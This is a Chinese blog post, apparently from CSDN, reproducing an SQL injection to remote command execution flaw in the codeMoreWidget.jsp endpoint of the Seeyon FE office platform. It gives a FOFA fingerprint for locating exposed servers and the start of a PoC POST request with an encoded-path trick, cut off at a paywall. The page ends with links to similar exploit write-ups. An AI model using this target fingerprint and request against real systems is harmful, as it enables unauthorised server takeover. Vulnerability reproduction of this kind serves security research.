致远互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现

已于 2024-06-29 10:44:53 修改
阅读量736 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-29 10:44:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140059992
版权

0x01 产品简介

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。

0x02 漏洞概述

致远互联FE协作办公平台 codeMoreWidget.jsp接口处存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

0x03 复现环境

FOFA:body="li_plugins_download"

0x04 漏洞复现

PoC

POST /common/codeMoreWidget.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

code=1';WA
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
致远互联FE协作办公平台 SQL注入漏洞复现
0xSec
12-08 1090
致远互联FE协作办公平台 editflow_manager.jsp、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
致远互联FE协作办公平台 editflow_manager.jsp 存在SQL注入漏洞
3tefanie丶zhou的博客
12-15 516
【每个结局伤感的故事,都有个温暖的开头,每年的大雪隆冬,都是从春暖花开中走来。】
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 877
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现致远互联FE协作办公平台——SQL注入
最新发布
LongL_GuYu的博客
06-30 559
致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。其ncsubjass.jsp接口处存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句。
致远互联FE协作办公平台 ncsubjass SQL注入RCE漏洞复现
0xSec
06-17 911
致远互联FE协作办公平台 ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
用友NC pagesServlet SQL注入RCE漏洞复现(XVE-2024-13067)
0xSec
06-03 929
用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
飞企互联-FE企业运营管理平台 多处 SQL注入RCE漏洞复现
0xSec
06-28 926
飞企互联-FE企业运营管理平台 checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
科迅图书馆云平台 WebCloud.asmx SQL注入RCE漏洞复现
0xSec
05-30 588
科迅图书馆云平台 WebCloud.asmx接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
(新接口)用友GRP-U8多个接口存在SQL 注入漏洞-0day
weixin_43167326的博客
02-22 448
用友GRP-U8是用友公司推出的一款企业级管理软件,涵盖财务、人力资源、供应链等多个领域,适用于各类企业。该系统拥有灵活的定制化功能,可根据企业需求进行模块选择和定制开发,满足不同行业的管理需求。用友GRP-U8整合了企业各业务环节,实现信息共享和流程优化,帮助企业提高管理效率,降低成本,提升竞争力。
致远OA Log4j2存在RCE
战神/calmness的博客
12-14 4715
目录 描述 Payload: 影响: 过程: 结果如下在dnslog上显示 描述 致远互联A8+是面向集团化、国际化、产业链和大型组织机构、涉外工作组织及组织群,针对其 组织范围内外协作应用设计的集团化管控和业务管控的一体化门户平台和工作入口。由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在受影响的致远相关版本进行代码执行,发现在野利用,建议相关用户尽快采取措施进行排查与防护。 Apache Log4j2是一款Ap...
致远M3-server反序列化RCE
weixin_62352348的博客
01-19 863
致远M3-server反序列化RCE
thinkphp 5.0.3 rce getshell_致远OA多版本Getshell漏洞
weixin_39560657的博客
10-26 278
影响版本 致远A8-V5协同管理软件 V6.1sp1致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同管理软件V7.1 利用前提 访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err 漏洞验证POC请求包POST /seeyon/htmloffices...
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞
Keepb1ue的博客
12-25 2075
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息。2.部署Web应用防火墙,对数据库操作进行监控。app=“致远互联-FE”1.升级至系统最新版本。
网红漏洞致远OA系统上的GetShell漏洞”详解
systemino的博客
07-08 1万+
概述 腾讯御界高级威胁检测系统近期监测到“致远OA系统上的 GetShell漏洞”在网上被频繁利用攻击政企客户。 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传webshell。 腾讯驻场工程师通过御界高级威胁检测系统告警通知及时向客户通报并采取必要措施,客户业务系统未受攻击影响。 详细分析 该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。 远程攻击者在无需登录的...
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值